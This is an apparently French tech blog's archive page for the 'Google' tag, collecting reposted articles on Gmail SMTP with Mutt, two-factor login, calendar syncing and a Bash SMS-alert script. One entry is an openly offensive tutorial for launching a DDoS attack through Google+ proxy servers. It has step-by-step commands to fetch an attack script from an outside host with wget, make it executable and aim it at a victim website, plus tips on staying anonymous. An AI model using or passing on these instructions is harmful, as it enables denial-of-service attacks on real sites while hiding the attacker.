Archive

Articles taggués ‘Google’

Email notifications using Gmail SMTP server on Linux

13/04/2016 Comments off

Send email notifications using Gmail SMTP

email notifications gmailUsing Gmail SMTP: Suppose you want to configure a Linux app to send out email messages from your server or desktop. The email messages can be part of email newsletters, status updates (e.g., Cachet), monitoring alerts (e.g., Monit), disk events (e.g., RAID mdadm), and so on. While you can set up your own outgoing mail server to deliver messages, you can alternatively rely on a freely available public SMTP server as a maintenance-free option.

One of the most reliable free SMTP servers is from Google’s Gmail service. All you have to do to send email notifications within your app is to add Gmail’s SMTP server address and your credentials to the app, and you are good to go.

One catch with using Gmail’s SMTP server is that there are various restrictions in place, mainly to combat spammers and email marketers who often abuse the server. For example, you can send messages to no more than 100 addresses at once, and no more than 500 recipients per day. Also, if you don’t want to be flagged as a spammer, you cannot send a large number of undeliverable messages. When any of these limitations is reached, your Gmail account will temporarily be locked out for a day. In short, Gmail’s SMTP server is perfectly fine for your personal use, but not meant for commercial bulk emails.

With that being said, let me demonstrate how to use Gmail’s SMTP server in Linux environment.

Google Gmail SMTP Server Setting

If you want to send emails from your app using Gmail’s SMTP server, you need to adjust the security setting of the Gmail account to be used. Go to the Google account settings, and enable the option to allow less secure apps, which is off by default.

Then you will need to provide your app with the following details.

  • Outgoing mail server (SMTP server): smtp.gmail.com
  • Use authentication: yes
  • Use secure connection: yes
  • Username: your Gmail account ID (e.g., « alice » if your email is alice@gmail.com)
  • Password: your Gmail password
  • Port: 587 (TLS) or 465 (SSL)

Exact configuration syntax may vary depending on apps. In the rest of this tutorial, I will show you several useful examples of using Gmail SMTP server in Linux.

Send Emails from the Command Line

As the first example, let’s try the most basic email functionality: send an email from the command line using Gmail SMTP server. For this, I am going to use a command-line email client called Mutt.

First, install Mutt as follows.

For Debian-based system:

$ sudo apt-get install mutt

For Red Hat based system:

$ sudo yum install mutt

Create a mutt configuration file (~/.muttrc) and specify in the file Gmail SMTP server information as follows. Replace <gmail-id> with your own Gmail ID. Note that this configuration is for sending emails only (not receiving emails).

$ vi ~/.muttrc

set from = "<gmail-id>@gmail.com"
set realname = "Dan Nanni"
set smtp_url = "smtp://<gmail-id>@smtp.gmail.com:587/"
set smtp_pass = "<gmail-password>"

Now you are ready to send out an email using mutt:

$ echo "This is an email body." | mutt -s "This is an email subject" alice@yahoo.com

To attach a file in an email, use « -a » option:

$ echo "This is an email body." | mutt -s "This is an email subject" alice@yahoo.com -a ~/test_attachment.jpg

22239850784_5fb0988075_c

Using Gmail SMTP server means that the emails appear as sent from your Gmail account. In other words, a recipient will see your Gmail address as the sender’s address. If you want to use your domain as the email sender, you need to use Gmail SMTP relay service instead.

Another note is that if you are concerned about placing your SMTP password in the plain-text .muttrc file, you can encrypt the password using GnuPG.

Lire la suite…

Launch DDoS Attack Using Google Servers with +DDoS Bash Script

07/12/2015 Comments off

DDoS-Using-Google+-Servers-HackersGarageRecently we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ Servers can be use for DDoS attack. Lets talk about this ant script, Hey.. but it is worthy.

How DDoS Attack Using Google+ Servers works?

When you post a URL on your Google+ status it fetches URL Summary (It includes Image + Short description) using Google+ Proxy Servers.

Advisory report says;  vulnerable pages are “/_/sharebox/linkpreview/“  and “gadgets/proxy?

So if you send multiple parallel requests with a big number e.g 1000 that can be turn into DDoS attack using Google+ Servers huge bandwidth.

How to use DDoS script to launch a DDoS attack Using Google+ Servers?

Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com

Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh

Make it executable :
chmod u+x ddos.sh

Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000

Now, lets look at this example :
It is recommended to find a full path to some big file which is downloadable without requesting for CAPTCHA.

e.g http://www.victim-website.com/some-file-url/file-name.mp3

NOTE : Make sure your workstation is capable to handle this huge number else your workstation will freeze and you will have to force fully restart your own workstation ?

e.g 1000 is very big number.

You will see anonymous source instead of Real Source IP:
See sample apache webserver log below

209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"

You can also access it in browser to remain anonymous using below example URL (replace URL with your own choice) :

https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none

Source: hackersgarage.com

Secure Your Linux Desktop and SSH Login Using Two Factor Google Authenticator

18/09/2015 Comments off

Source: nixCraft

Two factor authentication is increasingly becoming a strongly recommended way of protecting user accounts in web applications from attackers by requiring a second method of authentication in addition to the standard username and password pair.

Although two factor authentication can encompass a wide range of techniques like biometrics or smart cards, the most commonly deployed technique in web applications is the one time password. If you have used applications like Gmail, you are probably familiar with the one time password generated by the Google Authenticator app that’s available on iOS or Android devices.

The algorithm used for the one time password in the Google Authenticator app is known as the Time-based One-Time Password (TOTP) algorithm. The TOTP algorithm is a standard algorithm approved by the IETF in (RFC 6238) totp-rfc.

Lire la suite…

Categories: Système Tags: , ,

How to: Add Multiple Google Calendars into iCal

28/01/2014 Comments off

Source: therealmacgenius.com

Do you have a GMail or Google account and use Google Calendar?  Have you ever needed to view multiple calendars in iCal, but can’t? Getting your Google Calendar into your iCal is fairly easy with a few simple steps.

To begin, you will need to do is fire up iCal, in iCal “Preferences,” and click on “Accounts” at the top. Then under “Account Type” select “Google” and fill out your username and password. After the window disappears go to “Server Settings” and make sure the server address is www.google.com, and that the port “use SSL” is checked. After you have checked over those things you will need to click on “Delegation” which should be right next to “Server Settings.” Click all the boxes of Calendar Categories that you would like to have in iCal and it in a few minutes your calendar should have the events from Google Calendar. iCal will automatically bring in new changes every 15 minutes; however, if you wish to have it done faster, just change the rate in the “Refresh Calendars” box.

There you go, all of your Google Calendars should now be in iCal, now you don’t have to view Google Calendars’ “Microsoft looking” interface.

Categories: Logiciel Tags: , ,

Mac OS X: Synchronisation AddressBook/iCal/iCloud/Google. L’impasse ?

28/01/2014 Comments off

Pour ceux qui ont eu la mauvaise idée de posséder un iMac, un iPhone *ET* un smartphone Android, se pose le problème de synchronisation des informations. J’en fais partie…

Est-ce que j’utilise iCloud avec mon iMac et mon iPhone et je reste planté avec mon Android chez Google Contacts?

Est-ce que j’utilise Google Contacts avec Android et j’utilise « Synchro avec Google » dans AddressBook et créer un compte GMail sur le iPhone?

Dans le premier cas, comment être certain que les contacts iCloud sont bien les mêmes que sur Google Contacts? Et réciproquement.

J’ai essayé le deuxième scénario: synchro stable la plupart du temps mais si on a le malheur de modifier ou effacer une fiche sur Mac OS X, la reprise d ela synchro crée un doublon, voire un triplon et pas forcément sur toutes les fiches, et pas forcément doublon plutôt que triplon, des fois plutôt sur les fiches « société » (sans nom/prénom) mais pas obligatoirement…

Comme vous le voyez, c’est pénible et ça enlève toute confiance dans une source (Google) ou l’autre (Mac OS X).

Une solution: SmoothSync for Cloud.

SmoothSync for Cloud Calendar syncs your iCloud calendars
https://play.google.com/store/apps/details?id=org.dmfs.caldav.icloud&feature=search_r esult#?t=W251bGwsMSwxLDEsIm9yZy5kbWZzLmNhbGRhdi5pY 2xvdWQiXQ..

SmoothSync for Cloud Contacts syncs your iCloud contacts
https://play.google.com/store/apps/details?id=org.dmfs.carddav.icloud&feature=search_ result#?t=W251bGwsMSwxLDEsIm9yZy5kbWZzLmNhcmRkYXYu aWNsb3VkIl0.

Alertes par SMS en Bash (via Google Calendar)

12/02/2013 Comments off

La remontée d’alerte par SMS (“Short Message Service”) est un plus non négligeable dans le monitoring de systèmes d’informations critiques.

Les services gratuits permettant d’utiliser les SMS depuis le système restent rare.

Depuis plusieurs années déjà, “Google Agenda” propose à ses clients des rappels de rendez-vous par SMS.
Rapidement, ce service Google fût détourné pour être utilisé comme source de remontée d’alertes (exemple : “SmsAlert : Envoyer des SMS gratuitement depuis ses serveurs” sur le site Macsim’s Mind qui utilisait le script PHP d’ Alexander Skakunov pour remonter des alertes par SMS).

Bien que très efficaces, la plupart de ces détournement sont implémentés en PHP qui n’est pas installé sur tous les serveurs.

L’idée de cet article et d’utiliser la même technique mais implémentée en BASH.

Principe de fonctionnement

Le principe est de créer un événement dans un agenda Google Calendar débutant dans 5 minutes et X secondes et d’avertir l’administrateur par SMS 5 minutes avant le début de l’événement. Le SMS sera donc envoyé après X secondes.

L’objectif du script “googalert” (disponible sur sourceforge) est de n’utiliser que des commandes classiques du shell, de pouvoir choisir l’agenda dans lesquels seront stockés les alertes et d’être parfaitement conforme à l’API Google(http://www.udel.edu/CIS/software/dist/google/calendar/java.client/gdata/doc/calendar.htmlvoir Add an event).

Lire la suite…

Categories: Système Tags: , , , ,